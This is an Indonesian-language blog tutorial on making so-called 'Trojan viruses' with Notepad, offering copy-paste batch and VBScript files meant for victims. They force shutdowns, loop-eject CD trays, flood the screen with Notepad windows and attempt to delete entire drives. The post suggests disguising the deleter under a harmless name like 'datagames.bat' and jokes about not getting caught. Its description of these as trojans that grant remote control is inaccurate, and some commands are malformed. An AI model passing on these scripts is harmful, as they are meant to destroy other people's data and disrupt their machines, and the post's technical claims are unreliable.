. Cara Membuat Virus Trojan Pada Notepad!!! Cara Membuat Virus Trojan Pada Notepad!!! - arif07 -->

Cara Membuat Virus Trojan Pada Notepad!!!

CARA MEMBUAT VIRUS TROJAN PADA NOTEPAD

By.      : ∆MR.RSD∆
Email : jejakadil5@gmail.com
Group :LMC(LaskarMuslimCyber)

Kali ini gua kasih tau bikin virus Trojan pada notepad bagi yang belom tau simak baik"

Abstrak
Dari dulu sampai sekarang virus tidak pernah ada habisnya, seperti pepatah mati satu
tumbuh seribu.
Virus pun banyak di kategorikan dari jenis yang tidak berbahaya hingga
sangat berbahaya.
Mudah banyak cara untuk menghapus virus. Tetapi di sini gua akan menjelaskan cara membuat virus agar tidak hanya tau
menghilangkannya saja.
Membuat virus tidak lah sesulit menghilangkan nya sebab ketika menghilangkan virus, tidak jarang virus tersebut muncul terus dan membandal.
Sedangkan ketika virus tersebut kita yang buat, maka otomatis kita sendiri tau cara
menghilangkannya.

Pendahuluan
Trojan horse atau Kuda Troya atau yang lebih dikenal sebagai Trojan dalam
keamanan komputer merujuk kepada sebuah bentuk perangkat lunak yang
mencurigakan (malicious software/malware) yang dapat merusak sebuah sistem atau
jaringan. Tujuan dari Trojan adalah memperoleh informasi dari target (password,
kebiasaan user yang tercatat dalam system log, data, dan lain-lain), dan mengendalikan
target (memperoleh hak akses pada target).

Pembahasan:



 Virus adalah salah satu hal yang di takutkan oleh kalangan orang yang bekecimpung di dunia
internet, virus juga sangat berbahaya bagi orang lain atau suatu kelompok baik perusahaan
atau Organisasi politik,
Contoh salah satu virus terkenal, Trojan adalah salah satu virus yang sangat terkenal, virus ini
masuk secara diam diam tanpa di ketahui oleh anti virus, virus ini biasanya di masukan lewat
aplikasi, pesan dll.
Oke hari ini saya akan mengajarkan cara membuat virus sederhana yang cukup untuk
membuat pusing si korban.
Langsung saja di praktekkan
Untuk Level sederhana Hanya dengan Notepad!!

1. Copy script di bawah ini
@echo shutdown -s -t 3 -f
Lalu simpan pada notepad dengan forman .bat pada type pilihan all files contoh (very.bat)
kerja virus ini:
• Akan melakukan shutdown sendiri dengan waktu 3 detik jika di buka
Mengatasinya:
• Dengan melakukan restart akan hilang sendiri
2.copy script di bawah ini

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Simpan script ini pada notepad dengan format .vbs

Kerja virus ini:
• Akan membuka dvd pada komputer dengan sendirinya jika virus ini di buka
Mengatasinya:
• Dengan melakukan restart.

3. Copy script di bawah ini

@ECHO off
:top START %SystemRoot%\system32\notepad.exe

Simpan script ini dengan format .bat pada notepad
Kerja virus ini:
• Akan membuka notepad sendiri secara terus menerus yang mengakibatkan komputer
hang. jika virus di buka
Mengatasinya:
• Dengan melakukan Restart
Level Sangat berbahaya!!!!
1. Copy script di bawah ini

@echo off
DEL C: -Y
DEL D: -Y

Simpan script ini di notepad dengan format .bat contoh biar tidak di ketahui (datagames.bat)
Kerja virus:
• Akan menghapus semuad data dari komputer
Mengatasinya:
• Dengan Instal Ulang
2. Copy script di bawah ini

cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep 5000>C:\sleep5000.vbs
echo Wscript.Sleep 3000>C:\sleep3000.vbs
echo Wscript.Sleep 4000>C:\sleep4000.vbs
echo Wscript.Sleep 2000>C:\sleep2000.vbs
cd %systemroot%\System32
dir
cls
start /w wscript.exe C:\sleep3000.vbs
echo BANGUN TIDUR KU TERUS MENGHANCURKAN SYSTEM…^__^
echo …………………
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo NEXT…………!
echo:
echo:
echo HALO SOBAT
echo MAU JADI TEMAN AKU ??
echo:
echo:
echo I'M JOU VIRUS!!!
start /w wscript.exe C:\sleep2000.vbs
echo …………
start /w wscript.exe C:\sleep4000.vbs
echo …………
echo NTAR…….!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo VIRUS INI ADALAH VIRUS YANG SANGAT MEMATIKAN…
cd C:\Documents and Settings\All Users\Start Menu\Programs\
mkdir LMC
start /w wscript.exe C:\sleep3000.vbs
echo:
echo:
echo:
echo:
echo HAPPY BIRTHDAY
echo KOMPUTER KAMU BAGUS DEH
echo BOLEH Q INTIP DIKIT
echo HMM BOLEH JUGA NEH ISINYA
echo CALL ME YACHH +6285789xxxxxx GPRS JUGA BOLEH KOK
echo:
echo:
echo:
echo:
echo:
echo SABARAN BRO…
start /w wscript.exe C:\sleep3000.vbs
echo ………..
echo zzzzzzz….
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo OKE….Virus AKTIF!
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
echo FIREWALL KAMU ANCUR…
start /w wscript.exe C:\sleep2000.vbs
echo SEMUA PROSESS UDAH DIBANTAI…
start /w wscript.exe C:\sleep2000.vbs
echo DENGAN SEGALA HORMAT VIRUS BOOTING DULU…
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo VIRUS MASUK PODIUM AKHIR!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo I LOVE U FULL
echo HA HA HA HA
echo:
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
pause
shutdown -f -s -c “BERTAUBATLAH, BACK TO UR GOD MOHON MAAF LAHIR DAN BATIN
WASSALUMUALAIKUM WR WB.”

Simpan pada notepad dengan format .bat contoh LMC.bat
Simpan dengan Type all files
Cara kerja:
• Dapat mengacak-acak sistem bawaan
• Menyebar lewat CMD
• Sulit hilang
Mengatasinya:
• Harus Instal ulang
Mungkin hanya sekian dari saya, dan saya mohon gunukan ini dengan bijak, dan tetap lah
selalu Poker Face, biar gak ketahuan :D

Penutup
Trojan sendiri sangat berbahaya bagi pc anda , karena trojan dapat membuat virus anda rusak
secara perlahan demi perlahan . Kalian bisa mengendalikan PC orang lain hanya dengan
membuat trojan di PC korban . Oleh karena itu jangan disalahgunakan ketika sudah dapat
membuat virus trojan.

Terimakasih telah membaca dengan baik semoga berhasil dan bermanfaat
Wassalamu'alaikum.wr.wb
logo
[Les't learn networking and programming]
  • WhatsApp
  • Instagram
  • Subscribe Our Newsletter

    Related Posts

    There is no other posts in this category.
    Buka Komentar
    Tutup Komentar

    0 Response to "Cara Membuat Virus Trojan Pada Notepad!!!"

    Iklan Atas Artikel

    loading...

    Iklan Tengah Artikel 1

    Iklan Tengah Artikel 2

    Iklan Bawah Artikel